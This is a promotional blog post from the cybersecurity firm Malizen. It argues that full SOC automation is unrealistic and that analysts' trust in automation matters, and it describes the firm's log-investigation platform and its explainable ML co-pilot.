We talk a lot about automation in all fields, and cybersecurity is certainly not spared. Certainly, automation is playing an increasingly vital role in cybersecurity, as it enhances efficiency, accuracy, and response time across various aspects of security operations. But while automation is often hailed as a cure-all, we, at Malizen, firmly believe that like any system,automation has its limitations. A 100% automated SOC or CERT that no longer requires humans? We don't really believe in that... We advocate for a trusted and transparent automation approach for the right security tasks. We explain all in this article.
Empowering cybersecurity through automation
Cybersecurity automation involves the use of technology, algorithms, and predefined workflows to automate repetitive tasks, streamline processes, and enable faster detection, analysis, and response to security incidents.
But can you get to 100% automation in cybersecurity ? Oh, the dream for many! The concept of a security system that can be set up and left to run on its own is certainly appealing. It promises to eliminate staffing shortages issues, security policy management, and breaches… One may wonder why this is not already the case. After all, we have a plethora of cybersecurity solutions available that claim to be automated from detection to remediation. Yet, we still find ourselves in need of analysts to staff security teams. Maybe because machines cannot swiftly, comprehensively, and accurately observe, interpret, and respond to the countless complexities of human decisions, whether in the physical or digital realm.
While automation has its benefits, it is important to recognize its limitations in the context of operational cybersecurity.As explained by Allie Mellen in her excellent article “The “Autonomous SOC” Is A Pipe Dream”, automation, despite its advancements, still relies on human involvement even in basic tasks, faces challenges in complex systems with inconsistent inputs, and encounters scope limitations when additional steps are introduced, emphasising the importance of adaptability in the ever-changing security environment. By the way, hackers aim at breaking rules, particularly the very rules upon which technologies are built making it clear that the automated security teams will remain vulnerable to attacks…
At Malizen, because we have observed numerous cybersecurity analysts and experts, we like to add an additional limitation to automation: trust. The level of trust plays a significant role in determining the extent of reliance on automation. Trust becomes particularly crucial when faced with complexity and unexpected scenarios that make it impractical to fully comprehend the workings of the automation. When the analyst goes back to review the system's recommendations to ensure there are no errors or omissions, one may question the time that was supposed to be saved…Between disuse and misuse of automated aids, individual biases, and the relevance of trust indicators in automated systems, the role of trust in automation reliance is a broad and fascinating subject. Maybe a topic for our machine learning doctoral student?
How does Malizen position itself on the topic of automation? What concrete solutions do we offer through our platform?
Malizen, where automation empowers humans
We have already provided you with a glimpse of our opinion on automation in cybersecurity in the previous paragraph,but let's emphasise it a bit further.
At Malizen, we understand the clear need for automation in the cybersecurity field, which has become a significant challenge for the industry. Simultaneously, we firmly believe that human involvement is indispensable in cybersecurity and that complete automation of all aspects is neither necessary nor achievable. Our goal then is to put people back in control, helping them discover new threats, understand attacks and resolve incidents. But that doesn't mean that people have to do EVERYTHING. That's where automation comes into play in our platform : automate the necessary tasks to let analysts concentrate on the essential and intriguing aspects of their work.
How does our visual log investigation platform technically address these objectives?
Enrichment and contextualisation
Indeed, events and alerts from many disparate sources are automatically aggregated in our tool, which automatically enriches the data. Cyber teams then get all the context they need to assess and understand the risk instead of chasing numerous false positives.
Our tool automatically correlates the data and therefore provides better visibility on the path of attackers within the organisation's network and therefore allows for faster response and improved detection playbooks.
Once correlated, the data is no longer queried manually but visualised with the automatic creation of relevant visualisations for each data typology thanks to the intelligence of the platform.
Enhanced decision-making with our co-pilot for better outcomes.
Our machine learning-powered co-pilot helps make more relevant decisions quickly. By learning from 3 different sources(events, context and analyst behaviour), our co-pilot is able to help junior, senior and apprentice analysts make faster decisions. Our co-pilot recommends avenues of investigation and decisions in a transparent and automatic manner,providing explanations for its recommendation.
By combining automated investigation with informed human decision-making, we can effectively investigate, triage, and comprehend a greater number of real incidents with enhanced accuracy.
After identifying a threat, the logical next step is to initiate a response. SOARs excel at automating the response process for known threats. However, the effectiveness of this automation depends on the reliability of data provided by other sources. This means that earlier stages of the workflow must deliver trustworthy outputs that can be seamlessly transmitted to response software. Integrating more precise data greatly enhances the efficacy of response tools.
At Malizen, we strongly believe that the success of a team (human+machine) is based on the trust that the human teammate places in his "machine" teammate. But today, the lack of trust in "too much" automated systems is a brake on their adoption. So to fully automate a cyberteam is a dream. We need to find the right mix of human and machine input to strengthen cyber teams. And that's what Malizen is based on and what we believe in.